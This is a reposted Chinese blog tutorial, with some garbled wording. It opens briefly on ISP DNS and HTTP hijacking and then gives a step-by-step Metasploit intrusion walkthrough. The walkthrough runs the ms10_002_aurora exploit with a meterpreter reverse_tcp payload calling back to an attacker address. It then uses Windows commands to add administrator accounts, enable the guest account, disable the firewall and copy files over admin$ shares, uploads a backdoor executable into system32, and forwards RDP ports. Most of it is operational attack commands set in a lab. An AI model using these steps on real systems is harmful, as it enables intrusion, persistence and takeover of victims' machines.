DNS劫持:使用者上網的DNS伺服器都是營運商配置設定的,是以,在這個節點上,營運商可以為所欲為
例如:通路一個網站,輸入域名,正常DNS伺服器傳回該域名的IP,而DNS劫持後,會傳回一個營運商額中間伺服器IP,該通路伺服器會一緻性的傳回302,讓使用者浏覽器跳轉到預處理好的帶廣告的網頁,在該網頁中再通過iframe打開使用者原來通路的位址
HTTP劫持:
在營運商的路由器節點上,設定協定檢測,一旦發現是http請求,而且是html類型請求,則攔截處理。後續做法往往分為2種、1種是DNS劫持傳回302讓使用者浏覽器跳轉到另外的位址,還有1種是在伺服器傳回的HTML資料中插入js或dom節點廣告
保證網絡連通性,配置網絡位址
<a href="https://s1.51cto.com/wyfs02/M01/9A/42/wKioL1lTbDHAQNoTAAONomhQPZA494.jpg" target="_blank"></a>
第一次使用msfconsole,開啟内建的資料庫PostgreSQL和metasplote
開啟PostgreSQL: service postgresql start
開啟metasploit: service metasploit start
root@kali:~ps -e|grep 5432(確定postgresql服務開啟,預設占用端口是5432)
root@kali:~# msfconsole
<a href="https://s3.51cto.com/wyfs02/M02/9A/41/wKiom1lTa_zwGengAAHy0wFA5dc620.jpg" target="_blank"></a>
查找10-002漏洞子產品 search 10-002
<a href="https://s3.51cto.com/wyfs02/M02/9A/42/wKiom1lTbGOjUMbrAANSYfqtYH8138.jpg" target="_blank"></a>
use exploit/windows/browser/ms10_002_aurora 進行漏洞攻擊
set payload windows/meterpreter/reverse_tcp 定義攻擊載荷
set lhost 192.168.48.123 定義本機位址
set URIPATH / 定義url的字尾(這裡我隻設定了一個/)
exploit 開發
<a href="https://s4.51cto.com/wyfs02/M02/9A/42/wKiom1lTbLDTHqYGAAPi-BV6hUk489.jpg" target="_blank"></a>
在攻擊主機打開目标網站http://192.168.48.123:8080/
<a href="https://s5.51cto.com/wyfs02/M01/9A/42/wKioL1lTbUjyzITDAAFdKKRfjFM974.jpg" target="_blank"></a>
sessions -i 1 打開連接配接會話
session 檢視已經成功擷取的會話,使用session -i 連接配接到指定序号的meterpreter會話已繼續利用
通過shell 擷取目标主機的遠端指令行
通過DOS建立賬号與密碼
<a href="https://s5.51cto.com/wyfs02/M01/9A/48/wKioL1lTpiCSq6kFAAJvTNv0odM262.jpg" target="_blank"></a>
Windows常用指令
<a href="https://s4.51cto.com/wyfs02/M00/06/69/wKiom1m3w46QYwW8AAHHQNERV7M910.jpg" target="_blank"></a>
1、net localgroup administrators 使用者名 密碼 /add(将使用者加到管理者,使其擁有管理權限)
2、net user guest /active:yes (激活guest使用者)
3、net user guest 12345 (修改guest密碼為12345)
4、net user (檢視賬号屬性)
5、net start (檢視開啟了那些服務)
6、net time \\ 目标ip (檢視對方時間)
7、net view (檢視區域網路中開啟了那些共享)
8、net share (檢視本地開啟的那些共享)
9、net share C$/del (删除c盤預設共享)
10、Copy xx.exe\\ip\admin$\System32 (将目前xx.exe複制到對方Admin$共享的System32目錄内)
11、sc config tlnesvr start= auto (修改telnet服務的啟動方式為自動,auto前面有一個空格)
12、net stop sharedaccess(關閉系統自帶的防火牆)
13、net send IP 消息(利用messenger服務向目标IP發送消息)
14、tasklist(檢視程序)
15、taskkill (結束程序)ntsd 強制結束程序
16、services.msc 進入本地計算機的服務
17、net use \\ip\ipc$ “” /user (建立空IPC連結)
18、net use \\ip\ipc$ “密碼” /user:”使用者名”(建立IPC非空連接配接,非空連結就是需要賬戶和密碼)
19、net use \\ip\ipc$ /del (删除ipc空連接配接)
20、net use z: \\127.0.0.1\c$ (映射目标主機磁盤c盤到本地磁盤z盤)
遠端連接配接該系統
rdesktop -u administrator -p 123 192.168.48.100:3389
<a href="https://s1.51cto.com/wyfs02/M00/9A/48/wKiom1lTpoqz2fysAAM7hxopnrk036.jpg" target="_blank"></a>
getuid檢視meterpreter注入到目标主機的程序所屬使用者
upload指令上傳檔案到目标主機,例如把後門程式setup.exe傳到目标主機system32目錄下
upload setup.exe C:\\windows\\system32\
portfwd 端口轉發
例如目标主機上開啟了3389,但是隻允許特定IP通路,攻擊主機無法連接配接,可以使用portfwd指令把目标主機的3389端口轉發到其他端口打開
例如:portfwd add -l 1122 -p 3389 -r 192.168.48.100
把目标主機192.168.48.100的3389端口轉發到1122端口
這是隻需要連接配接目标的1122端口就可以打開遠端桌面了
rdesktop -u administrator -p 123456 192.168.48.100:1122
sysinfo檢視目标主機系統資訊
ps 檢視目标主機上運作的程序資訊,結合migrate使用
本文轉自 周小玉 51CTO部落格,原文連結:http://blog.51cto.com/maguangjie/1942769,如需轉載請自行聯系原作者